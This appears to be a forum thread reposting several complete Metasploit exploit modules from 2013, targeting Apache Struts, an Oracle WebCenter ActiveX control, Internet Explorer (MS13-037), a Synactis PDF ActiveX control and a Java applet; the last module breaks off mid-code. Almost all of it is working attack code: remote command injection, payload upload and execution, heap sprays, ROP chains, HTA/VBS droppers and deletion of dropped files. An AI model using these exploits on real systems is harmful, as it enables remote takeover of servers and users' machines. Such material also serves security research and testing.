#   http://metasploit.com/
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking
 
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Apache Struts includeParams Remote Code Execution',
      'Description'    => %q{
          This module exploits a remote command execution vulnerability in Apache Struts
        versions < 2.3.14.2. A specifically crafted request parameter can be used to inject
        arbitrary OGNL code into the stack bypassing Struts and OGNL library protections.
        When targeting an action which requires interaction through GET the payload should
        be split having into account the uri limits. In this case, if the rendered jsp has
        more than one point of injection, it could result in payload corruption. It should
        happen only when the payload is larger than the uri length.
      },
      'Author'         =>
        [
          # This vulnerability was also discovered by unknown members of:
          #    'Coverity security Research Laboratory'
          #    'NSFOCUS Security Team'
          'Eric Kobrin', # Vulnerability Discovery
          'Douglas Rodrigues', # Vulnerability Discovery
          'Richard Hicks <scriptmonkey.blog[at]gmail.com>' # Metasploit Module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2013-2115'],
          [ 'CVE', '2013-1966'],
          [ 'OSVDB', '93645'],
          [ 'URL', 'https://cwiki.apache.org/confluence/display/WW/S2-014'],
          [ 'URL', 'http://struts.apache.org/development/2.x/docs/s2-013.html']
        ],
      'Platform'      => [ 'win', 'linux', 'java'],
      'Privileged'     => true,
      'Targets'        =>
        [
          ['Windows Universal',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'win'
            }
          ],
          ['Linux Universal',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'linux'
            }
          ],
          [ 'Java Universal',
            {
              'Arch' => ARCH_JAVA,
              'Platform' => 'java'
            },
          ]
        ],
      'DisclosureDate' => 'May 24 2013',
      'DefaultTarget' => 2))
 
    register_options(
      [
        Opt::RPORT(8080),
        OptString.new('PARAMETER',[ true, 'The parameter to use for the exploit (does not have to be an expected one).',rand_text_alpha_lower(4)]),
        OptString.new('TARGETURI', [ true, 'The path to a vulnerable struts application action', "/struts2-blank/example/HelloWorld.action"]),
        OptEnum.new('HTTPMETHOD', [ true, 'Which HTTP Method to use, GET or POST','POST', ['GET','POST']]),
        OptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5])
      ], self.class)
  end
 
  def execute_command(cmd, opts = {})
    inject_string = @inject.gsub(/CMD/,cmd)
    uri = normalize_uri(target_uri.path)
    req_hash = {'uri' => uri, 'version' => '1.1', 'method' => datastore['HTTPMETHOD'] }
    case datastore['HTTPMETHOD']
      when 'POST'
        req_hash.merge!({ 'vars_post' => { datastore['PARAMETER'] => inject_string }})
      when 'GET'
        req_hash.merge!({ 'vars_get' => { datastore['PARAMETER'] => inject_string }})
    end
 
    # Display a nice "progress bar" instead of message spam
    case @notify_flag
    when 0
      print_status("Performing HTTP #{datastore['HTTPMETHOD']} requests to upload payload")
      @notify_flag = 1
    when 1
      print(".") # Progress dots
    when 2
      print_status("Payload upload complete")
    end
 
    return send_request_cgi(req_hash) #Used for check function.
  end
 
  def exploit
    #initialise some base vars
    @inject = "${#_memberAccess[\"allowStaticMethodAccess\"]=true,CMD}"
    @java_upload_part_cmd = "#f=new java.io.FileOutputStream('FILENAME',APPEND),#f.write(new sun.misc.BASE64Decoder().decodeBuffer('BUFFER')), #f.close()"
    #Set up generic values.
    @payload_exe = rand_text_alphanumeric(4+rand(4))
    pl_exe = generate_payload_exe
    append = false
    #Now arch specific...
    case target['Platform']
    when 'linux'
      @payload_exe = "/tmp/#{@payload_exe}"
      chmod_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_chmod +x #{@payload_exe}\".split(\"_\"))"
      exec_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_#{@payload_exe}\".split(\"_\"))"
    when 'java'
      @payload_exe << ".jar"
      pl_exe = payload.encoded_jar.pack
      exec_cmd = ""
      exec_cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked'),"
      exec_cmd << "#q.setAccessible(true),#q.set(null,true),"
      exec_cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15'),"
      exec_cmd << "#q.setAccessible(true),#q.set(null,false),"
      exec_cmd << "#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{@payload_exe}').toURI().toURL()}),"
      exec_cmd << "#c=#cl.loadClass('metasploit.Payload'),"
      exec_cmd << "#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke("
      exec_cmd << "null,new java.lang.Object[]{new java.lang.String[0]})"
    when 'windows'
      @payload_exe = "./#{@payload_exe}.exe"
      exec_cmd = "@java.lang.Runtime@getRuntime().exec('#{@payload_exe}')"
    else
      fail_with(Exploit::Failure::NoTarget, 'Unsupported target platform!')
    end
 
    print_status("Preparing payload...")
    # Now with all the arch specific stuff set, perform the upload.
    # Need to calculate amount to allocate for non-dynamic parts of the URL.
    # Fixed strings are tokens used for substitutions.
    append_length = append ? "true".length : "false".length # Gets around the boolean/string issue
    sub_from_chunk = append_length + ( @java_upload_part_cmd.length - "FILENAME".length - "APPEND".length - "BUFFER".length )
    sub_from_chunk += ( @inject.length - "CMD".length ) + @payload_exe.length + normalize_uri(target_uri.path).length + datastore['PARAMETER'].length
    case datastore['HTTPMETHOD']
      when 'GET'
        chunk_length = 2048 - sub_from_chunk # Using the max request length of 2048 for IIS, subtract all the "static" URL items.
        #This lets us know the length remaining for our base64'd payloads
        chunk_length = ((chunk_length/4).floor)*3
      when 'POST'
        chunk_length = 65535 # Just set this to an arbitrarily large value, as its a post request we don't care about the size of the URL anymore.
    end
    @notify_flag = 0
    while pl_exe.length > chunk_length
      java_upload_part(pl_exe[0,chunk_length],@payload_exe,append)
      pl_exe = pl_exe[chunk_length,pl_exe.length - chunk_length]
      append = true
    end
    java_upload_part(pl_exe,@payload_exe,append)
    execute_command(chmod_cmd) if target['Platform'] == 'linux'
    print_line() # new line character, after progress bar.
    @notify_flag = 2 # upload is complete, next command we're going to execute the uploaded file.
    execute_command(exec_cmd)
    register_files_for_cleanup(@payload_exe)
  end
 
  def java_upload_part(part, filename, append = false)
    cmd = @java_upload_part_cmd.gsub(/FILENAME/,filename)
    append = append ? "true" : "false" # converted for the string replacement.
    cmd = cmd.gsub!(/APPEND/,append)
    cmd = cmd.gsub!(/BUFFER/,Rex::Text.encode_base64(part))
    execute_command(cmd)
  end
 
  def check
    #initialise some base vars
    @inject = "${#_memberAccess[\"allowStaticMethodAccess\"]=true,CMD}"
    print_status("Performing Check...")
    sleep_time = datastore['CHECK_SLEEPTIME']
    check_cmd = "@java.lang.Thread@sleep(#{sleep_time * 1000})"
    t1 = Time.now
    print_status("Asking remote server to sleep for #{sleep_time} seconds")
    response = execute_command(check_cmd)
    t2 = Time.now
    delta = t2 - t1
 
 
    if response.nil?
      return Exploit::CheckCode::Safe
    elsif delta < sleep_time
      return Exploit::CheckCode::Safe
    else
      return Exploit::CheckCode::Appears
    end
  end
 
end

Добавлено в [time]1370241264[/time]
Oracle WebCenter Content CheckOutAndOpen.dll ActiveX RCE

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
 
  def initialize(info={})
    super(update_info(info,
      'Name'           => "Oracle WebCenter Content CheckOutAndOpen.dll ActiveX Remote Code Execution",
      'Description'    => %q{
          This modules exploits a vulnerability found in the Oracle WebCenter Content
        CheckOutAndOpenControl ActiveX. This vulnerability exists in openWebdav(), where
        user controlled input is used to call ShellExecuteExW(). This module abuses the
        control to execute an arbitrary HTA from a remote location. This module has been
        tested successfully with the CheckOutAndOpenControl ActiveX installed with Oracle
        WebCenter Content 11.1.1.6.0.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'rgod <rgod[at]autistici.org>', # Vulnerability discovery
          'juan vazquez' # Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2013-1559' ],
          [ 'OSVDB', '92386' ],
          [ 'BID', '59122' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/cpuapr2013-1899555.html' ],
          [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-094/' ]
        ],
      'Payload'        =>
        {
          'Space'    => 2048,
          'StackAdjustment' => -3500
        },
      'DefaultOptions'  =>
        {
          'InitialAutoRunScript' => 'migrate -f -k'
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Automatic', {} ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Apr 16 2013",
      'DefaultTarget'  => 0))
  end
 
  def exploit
    @var_exename = rand_text_alpha(5 + rand(5)) + ".exe"
    @dropped_files = [
      @var_exename
    ]
    super
  end
 
  def on_new_session(session)
    if session.type == "meterpreter"
      session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
    end
 
    @dropped_files.delete_if do |file|
      win_file = file.gsub("/", "\\\\")
      if session.type == "meterpreter"
        begin
          wintemp = session.fs.file.expand_path("%TEMP%")
          win_file = "#{wintemp}\\#{win_file}"
          session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
          session.fs.file.rm(win_file)
          print_good("Deleted #{file}")
          true
        rescue ::Rex::Post::Meterpreter::RequestError
          print_error("Failed to delete #{win_file}")
          false
        end
 
      end
    end
  end
 
  def build_hta(cli)
    var_shellobj    = rand_text_alpha(rand(5)+5);
    var_fsobj    = rand_text_alpha(rand(5)+5);
    var_fsobj_file    = rand_text_alpha(rand(5)+5);
    var_vbsname    = rand_text_alpha(rand(5)+5);
    var_writedir    = rand_text_alpha(rand(5)+5);
 
    var_origLoc    = rand_text_alpha(rand(5)+5);
    var_byteArray    = rand_text_alpha(rand(5)+5);
    var_writestream    = rand_text_alpha(rand(5)+5);
    var_strmConv    = rand_text_alpha(rand(5)+5);
 
    p = regenerate_payload(cli);
    exe = generate_payload_exe({ :code => p.encoded })
 
    # Doing in this way to bypass the ADODB.Stream restrictions on JS,
    # even when executing it as an "HTA" application
    # The encoding code has been stolen from ie_unsafe_scripting.rb
    print_status("Encoding payload into vbs/javascript/hta...");
 
    # Build the content that will end up in the .vbs file
    vbs_content  = Rex::Text.to_hex(%Q|
Dim #{var_origLoc}, s, #{var_byteArray}
#{var_origLoc} = SetLocale(1033)
|)
    # Drop the exe payload into an ansi string (ansi ensured via SetLocale above)
    # for conversion with ADODB.Stream
    vbs_ary = []
    # The output of this loop needs to be as small as possible since it
    # gets repeated for every byte of the executable, ballooning it by a
    # factor of about 80k (the current size of the exe template).  In its
    # current form, it's down to about 4MB on the wire
    exe.each_byte do |b|
      vbs_ary << Rex::Text.to_hex("s=s&Chr(#{("%d" % b)})\n")
    end
    vbs_content << vbs_ary.join("")
 
    # Continue with the rest of the vbs file;
    # Use ADODB.Stream to convert from an ansi string to it's byteArray equivalent
    # Then use ADODB.Stream again to write the binary to file.
    #print_status("Finishing vbs...");
    vbs_content << Rex::Text.to_hex(%Q|
Dim #{var_strmConv}, #{var_writedir}, #{var_writestream}
                    #{var_writedir} = WScript.CreateObject("WScript.Shell").ExpandEnvironmentStrings("%TEMP%") & "\\#{@var_exename}"
 
Set #{var_strmConv} = CreateObject("ADODB.Stream")
 
#{var_strmConv}.Type = 2
#{var_strmConv}.Charset = "x-ansi"
#{var_strmConv}.Open
#{var_strmConv}.WriteText s, 0
#{var_strmConv}.Position = 0
#{var_strmConv}.Type = 1
#{var_strmConv}.SaveToFile #{var_writedir}, 2
 
SetLocale(#{var_origLoc})|)
 
    hta = <<-EOS
      <script>
      var #{var_shellobj} = new ActiveXObject("WScript.Shell");
      var #{var_fsobj}    = new ActiveXObject("Scripting.FileSystemObject");
      var #{var_writedir} = #{var_shellobj}.ExpandEnvironmentStrings("%TEMP%");
      var #{var_fsobj_file} = #{var_fsobj}.OpenTextFile(#{var_writedir} + "\\\\" + "#{var_vbsname}.vbs",2,true);
 
      #{var_fsobj_file}.Write(unescape("#{vbs_content}"));
      #{var_fsobj_file}.Close();
 
      #{var_shellobj}.run("wscript.exe " + #{var_writedir} + "\\\\" + "#{var_vbsname}.vbs", 1, true);
      #{var_shellobj}.run(#{var_writedir} + "\\\\" + "#{@var_exename}", 0, false);
      #{var_fsobj}.DeleteFile(#{var_writedir} + "\\\\" + "#{var_vbsname}.vbs");
      window.close();
      </script>
    EOS
 
    return hta
  end
 
  def on_request_uri(cli, request)
    agent = request.headers['User-Agent']
 
    if agent !~ /MSIE \d/
      print_error("Browser not supported: #{agent.to_s}")
      send_not_found(cli)
      return
    end
 
    print_status("Request received for #{request.uri}");
 
    if request.uri =~ /\.hta$/
      hta = build_hta(cli)
      print_status("Sending HTA application")
      send_response(cli, hta, {'Content-Type'=>'application/hta'})
      return
    end
 
    uri  = "#{get_uri}#{rand_text_alpha(rand(3) + 3)}.hta"
 
    html = <<-EOS
    <html>
    <body>
    <object id="target" width="100%" height="100%" classid="clsid:A200D7A4-CA91-4165-9885-AB618A39B3F0"></object>
    <script>
      target.openWebdav("#{uri}");
    </script>
    </body>
    </html>
    EOS
 
    print_status("Sending HTML")
    send_response(cli, html, {'Content-Type'=>'text/html'})
 
  end
 
end
 
=begin
 
* The vulnerable control tries to solve how to open the provided extension
 
.text:100099FC                 lea     eax, [ebp+830h+Src]
.text:10009A02                 push    eax            ; lpResult
.text:10009A03                 lea     eax, [ebp+830h+Directory]
.text:10009A06                 push    eax            ; lpDirectory
.text:10009A07                 lea     eax, [ebp+830h+PathName]
.text:10009A0D                 push    eax            ; lpFile
.text:10009A0E                 call    ds:FindExecutableW; This function returns the executable associated with the specified file for the default verb
 
* If succeeds, the provided user data is used as argument:
 
.text:10009D8F                 lea     eax, [ebp+psz]
.text:10009D95                 mov     [ebp+pExecInfo.lpFile], eax
.text:10009D9B                 mov     eax, [ebp+var_238]
.text:10009DA1                 mov     [ebp+pExecInfo.cbSize], 3Ch
.text:10009DAB                 mov     [ebp+pExecInfo.fMask], 2000000h
.text:10009DB5                 mov     [ebp+pExecInfo.hwnd], ebx
.text:10009DBB                 mov     [ebp+pExecInfo.lpVerb], offset aOpen; "open"
.text:10009DC5                 jnb     short loc_10009DCD
.text:10009DC7                 lea     eax, [ebp+var_238]
.text:10009DCD
.text:10009DCD loc_10009DCD:                          ; CODE XREF: make_ShellExecute_sub_10009ACC+2F9j
.text:10009DCD                 mov     [ebp+pExecInfo.lpParameters], eax
.text:10009DD3                 lea     eax, [ebp+pExecInfo]
.text:10009DD9                 push    eax            ; pExecInfo
.text:10009DDA                 mov     [ebp+pExecInfo.lpDirectory], ebx
.text:10009DE0                 mov     [ebp+pExecInfo.nShow], 0Ah
.text:10009DEA                 call    ds:ShellExecuteExW
 
* On the debugger:
 
Breakpoint 1 hit
eax=0201ef6c ebx=00000000 ecx=00000000 edx=03850608 esi=00000008 edi=00000000
eip=10009dea esp=0201ee08 ebp=0201f200 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000212
CheckOutAndOpen!DllUnregisterServer+0x7108:
10009dea ff156cd20210    call    dword ptr [CheckOutAndOpen!DllUnregisterServer+0x2a58a (1002d26c)] ds:0023:1002d26c={SHELL32!ShellExecuteExW (7ca02f03)}
0:007> dd esp
0201ee08  0201ef6c <== pExecInfo
0:007> dd 0201ef6c
0201ef6c  0000003c 02000000 00000000 10031468
0201ef7c  0201efe0 03854688
0:007> du 0201efe0
0201efe0  "C:\WINDOWS\system32\mshta.exe"
0:007> du 03854688
03854688  ""http://192.168.172.1:8080/xKRTv"
038546c8  "m0mqpAt7sEYdVq.hta""
 
This code allows to launch other executables with user data provided as argument, but at the moment I like the HTA
solution because it allows to pass URL's as arguments. And code executed by mshta is on a privileged zone. Other
executables allow to provide SMB URI's but metasploit only allow to 'simulate' a SMB resource through webdav, so
the target should have the WebClient service enabled, which is only enabled by default on XP SP3.
=end

 

[DarckSol]

MS13-037 Microsoft Internet Explorer textNode Use-After-Free

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking
 
  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::RopDb
 
  def initialize(info={})
    super(update_info(info,
      'Name'           => "MS13-037 Microsoft Internet Explorer textNode Use-After-Free",
      'Description'    => %q{
        This module exploits a use-after-free vulnerability in Microsoft Internet Explorer
        where a DOM textNode pointer becomes corrupted after style computation. This pointer is then overwritten when the innerHTML property on the parent object is set.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Scott Bell <scott.bell@security-assessment.com>' # Vulnerability discovery & Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2013-1311' ],
          [ 'MSB', 'MS13-037' ],
          [ 'URL', 'http://security-assessment.com/files/documents/advisory/ms13_037_ie_textnode_uaf.pdf' ]
        ],
      'Payload'    =>
        {
          'BadChars'       => "\x00",
          'Space'          => 812,
          'DisableNops'    => true,
          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
        },
      'DefaultOptions'  =>
        {
          'InitialAutoRunScript' => 'migrate -f'
        },
      'Platform'    => 'win',
      'Targets'    =>
        [
          [ 'Automatic', {} ],
          [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => 0x5f4 } ]
        ],
      'Privileged'    => false,
      'DisclosureDate'  => "June 6 2013",
      'DefaultTarget'   => 0))
 
    register_options(
      [
        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
      ], self.class)
 
  end
 
  def get_target(agent)
    #If the user is already specified by the user, we'll just use that
    return target if target.name != 'Automatic'
 
    nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
    ie = agent.scan(/MSIE (\d)/).flatten[0] || ''
 
    ie_name = "IE #{ie}"
 
    case nt
    when '5.1'
      os_name = 'Windows XP SP3'
    end
 
    targets.each do |t|
      if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
        print_status("Target selected as: #{t.name}")
        return t
      end
    end
 
    return nil
  end
 
  def heap_spray(my_target, p)
    js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
    js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
 
    js = %Q|
 
      var heap_obj = new heapLib.ie(0x20000);
      var code = unescape("#{js_code}");
      var nops = unescape("#{js_nops}");
      while (nops.length < 0x80000) nops += nops;
      var offset = nops.substring(0, #{my_target['Offset']});
      var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
      while (shellcode.length < 0x40000) shellcode += shellcode;
      var block = shellcode.substring(0, (0x80000-6)/2);
      heap_obj.gc();
      for (var i=1; i < 0x300; i++) {
        heap_obj.alloc(block);
      }
      var overflow = nops.substring(0, 10);
 
    |
 
    js = heaplib(js, {:noobfu => true})
 
    if datastore['OBFUSCATE']
      js = ::Rex::Exploitation::JSObfu.new(js)
      js.obfuscate
 
    end
 
    return js
  end
 
  def get_payload(t, cli)
    code = payload.encoded
 
    # No rop. Just return the payload.
    return code if t['Rop'].nil?
 
    # ROP chain generated by mona.py - See corelan.be
    case t['Rop']
    when :msvcrt
      print_status("Using msvcrt ROP")
 
      stack_pivot = [
      0x77c1cafb, # POP EBP # RETN [msvcrt.dll]
      0x41414141, # Junk
      0x781a04cb # POP ECX # PUSH ESP # RETN [urlmon.dll]
      ].pack("V*")
 
      # Set up required heap layout
      junk = "#{Rex::Text.rand_text_alpha(4)}"
      null = "\x00"*4
      valid_ptr = [0x0c0c0c0c].pack("V*")
      offset = [0x0c0c0c6c].pack("V*")
      heap_foo = junk*5 +
        valid_ptr*2 +
        junk +
        offset +
        junk*4 +
        valid_ptr +
        junk*6 +
        valid_ptr +
        null +
        junk*2
 
      rop_payload = heap_foo << generate_rop_payload('msvcrt', "", {'pivot'=>stack_pivot, 'target'=>'xp'})
      rop_payload << code
    end
 
    return rop_payload
  end
 
  def get_exploit(my_target, cli)
    p  = get_payload(my_target, cli)
    js = heap_spray(my_target, p)
 
    html = %Q|
    <!doctype html>
    <html>
    <head>
    <script>
    #{js}
    function exploit() {
      var obj = document.createElement('s')
      obj.innerHTML = "⍼☠"
      document.body.appendChild(obj)
 
      document.styleSheets[0].cssText = "body:first-line{color:blue}"
      CollectGarbage()
 
      setTimeout(function(){
        for (i=0;i<1000;i++){
          obj.innerHTML = "\\u0c2c\\u0c0c\\u0c0c\\u0c0c\\u0c0c\\u0c0c\\u0c0c\\u0c0c";
        }
      }, 500)
    }
    </script>
    <style>
    </style>
    </head>
    <body onload='setTimeout("exploit()", 2000)'>
    </body>
    </html>
    |
 
    return html
  end
 
 
  def on_request_uri(cli, request)
    agent = request.headers['User-Agent']
    uri   = request.uri
    print_status("Requesting: #{uri}")
 
    my_target = get_target(agent)
    # Avoid the attack if no suitable target found
    if my_target.nil?
      print_error("Browser not supported, sending 404: #{agent}")
      send_not_found(cli)
      return
    end
 
    html = get_exploit(my_target, cli)
    html = html.gsub(/^\t\t/, '')
    print_status "Sending HTML..."
    send_response(cli, html, {'Content-Type'=>'text/html'})
 
  end
 
end

 

[DarckSol]

Synactis PDF In-The-Box ConnectToSynactic Stack Buffer Overflow

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::RopDb
include Msf::Exploit::Remote::BrowserAutopwn

autopwn_info({
:ua_name => HttpClients::IE,
:ua_minver => "7.0",
:ua_maxver => "8.0",
:javascript => true,
:classid => "{C80CAF1F-C58E-11D5-A093-006097ED77E6}",
:method => "ConnectToSynactis",
:os_name => OperatingSystems::WINDOWS,
:rank => AverageRanking
})

def initialize(info={})
super(update_info(info,
'Name' => "Synactis PDF In-The-Box ConnectToSynactic Stack Buffer Overflow",
'Description' => %q{
This module exploits a vulnerability found in Synactis' PDF In-The-Box ActiveX
component, specifically PDF_IN_1.ocx. When a long string of data is given
to the ConnectToSynactis function, which is meant to be used for the ldCmdLine
argument of a WinExec call, a strcpy routine can end up overwriting a TRegistry
class pointer saved on the stack, and results in arbitrary code execution under the
context of the user.

Also note that since the WinExec function is used to call the default browser,
you must be aware that: 1) The default must be Internet Explorer, and 2) When the
exploit runs, another browser will pop up.

Synactis PDF In-The-Box is also used by other software such as Logic Print 2013,
which is how the vulnerability was found and publicly disclosed.
},
'License' => MSF_LICENSE,
'Author' =>
[
'h1ch4m',
'sinn3r' #Metasploit
],
'References' =>
[
[ 'OSVDB', '93754' ],
[ 'EDB', '25835' ]
],
'Platform' => 'win',
'Targets' =>
[
# Newer setups like Win + IE8: "Object doesn't support this property or method"
[ 'Automatic', {} ],
[
'IE 7 on Windows XP SP3', {'Eax' => 0x0c0c0c0c}
],
[
# 0x20302020 = Where the heap spray will land
# 0x77c15ed5 = xchg eax,esp; rcr dword ptr [esi-75], 0c1h, pop ebp; ret 4
'IE 8 on Windows XP SP3',
{ 'Rop' => :msvcrt, 'Pivot' => 0x77C218D3, 'Ecx' => 0x20302024, 'Eax' => 0x20302028 }
]
],
'Payload' =>
{
'BadChars' => "\x00",
'StackAdjustment' => -3500
},
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f'
},
'Privileged' => false,
'DisclosureDate' => "May 30 2013",
'DefaultTarget' => 0))
end

def get_target(agent)
return target if target.name != 'Automatic'

nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
ie = agent.scan(/MSIE (\d)/).flatten[0] || ''

ie_name = "IE #{ie}"

case nt
when '5.1'
os_name = 'Windows XP SP3'
end

targets.each do |t|
if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
return t
end
end

return nil
end

def get_payload(t, cli)
code = payload.encoded

case t['Rop']
when :msvcrt
print_status("Using msvcrt ROP")
align = "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
# Must be null-byte-free for the spray
chain =
[
t['Pivot'],
0x41414141,
t['Ecx'], # To ECX
0x77c1e844, # POP EBP # RETN [msvcrt.dll]
0x41414141,
0x77c1e844, # skip 4 bytes [msvcrt.dll]
0x77c4fa1c, # POP EBX # RETN [msvcrt.dll]
0xffffffff,
0x77c127e5, # INC EBX # RETN [msvcrt.dll]
0x77c127e5, # INC EBX # RETN [msvcrt.dll]
0x77c4e0da, # POP EAX # RETN [msvcrt.dll]
0x2cfe1467, # put delta into eax (-> put 0x00001000 into edx)
0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
0x77c58fbc, # XCHG EAX,EDX # RETN [msvcrt.dll]
0x77c34fcd, # POP EAX # RETN [msvcrt.dll]
0x2cfe04a7, # put delta into eax (-> put 0x00000040 into ecx)
0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
0x77c14001, # XCHG EAX,ECX # RETN [msvcrt.dll]
0x77c3048a, # POP EDI # RETN [msvcrt.dll]
0x77c47a42, # RETN (ROP NOP) [msvcrt.dll]
0x77c46efb, # POP ESI # RETN [msvcrt.dll]
0x77c2aacc, # JMP [EAX] [msvcrt.dll]
0x77c3b860, # POP EAX # RETN [msvcrt.dll]
0x77c1110c, # ptr to &VirtualAlloc() [IAT msvcrt.dll]
0x77c12df9, # PUSHAD # RETN [msvcrt.dll]
0x77c35459 # ptr to 'push esp # ret ' [msvcrt.dll]
].pack("V*")

p = chain + align + code

else
p = "\x0c" * 50 + code
end

p
end

def get_html(cli, req, target)
js_p = ::Rex:ext.to_unescape(get_payload(target, cli), ::Rex::Arch.endian(target.arch))
eax = "\\x" + [target['Eax']].pack("V*").unpack("H*")[0].scan(/../) * "\\x"

html = %Q|
<html>
<head>
<script>
#{js_property_spray}

function r()
{
var s = unescape("#{js_p}");
sprayHeap({shellcode:s});

var p1 = '';
var p2 = '';
eax = "#{eax}";

while (p1.length < 189) p1 += "\\x0c";
while (p2.length < 7000) p2 += "\\x0c";

var obj = document.getElementById("obj");
obj.ConnectToSynactis(p1+eax+p2);
}
</script>
</head>
<body OnLoad="r();">
<OBJECT classid="clsid:C80CAF1F-C58E-11D5-A093-006097ED77E6" id="obj"></OBJECT>
</body>
</html>
|

html.gsub(/^\t\t/, '')
end

def on_request_uri(cli, request)
agent = request.headers['User-Agent']
uri = request.uri
print_status("Requesting: #{uri}")

target = get_target(agent)
if target.nil?
print_error("Browser not supported, sending 404: #{agent}")
send_not_found(cli)
return
end

print_status("Target selected as: #{target.name}")
send_response(cli, get_html(cli, request, target), {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'})
end
end

Добавлено в [time]1370935621[/time]
Java Applet Driver Manager Privileged toString() Remote Code Execution

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##
 
require 'msf/core'
require 'rex'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
 
  include Msf::Exploit::Remote::BrowserAutopwn
  autopwn_info({ :javascript => false })
 
  def initialize( info = {} )
 
    super( update_info( info,
      'Name'          => 'Java Applet Driver Manager Privileged toString() Remote Code Execution',
      'Description'   => %q{
          This module abuses the java.sql.DriverManager class where the toString() method
        is called over user supplied classes, from a doPrivileged block. The vulnerability
        affects Java version 7u17 and earlier. This exploit bypasses click-to-play on IE
        throw a specially crafted JNLP file. This bypass is applied mainly to IE, when Java
        Web Start can be launched automatically throw the ActiveX control. Otherwise the
        applet is launched without click-to-play bypass.
      },
      'License'       => MSF_LICENSE,
      'Author'        =>
        [
          'James Forshaw', # Vulnerability discovery and Analysis
          'juan vazquez' # Metasploit module
        ],
      'References'    =>
        [
          [ 'CVE', '2013-1488' ],
          [ 'OSVDB', '91472' ],
          [ 'BID', '58504' ],
          [ 'URL', 'http://www.contextis.com/research/blog/java-pwn2own/' ],
          [ 'URL', 'http://immunityproducts.blogspot.com/2013/04/yet-another-java-security-warning-bypass.html' ],
          [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-076/' ]
        ],
      'Platform'      => [ 'java', 'win', 'osx', 'linux' ],
      'Payload'       => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'       =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => ['java'],
              'Arch' => ARCH_JAVA,
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86,
            }
          ],
          [ 'Mac OS X x86 (Native Payload)',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_X86,
            }
          ],
          [ 'Linux x86 (Native Payload)',
            {
              'Platform' => 'linux',
              'Arch' => ARCH_X86,
            }
          ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jan 10 2013'
    ))
  end
 
 
  def setup
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1488", "Exploit.class")
    @exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
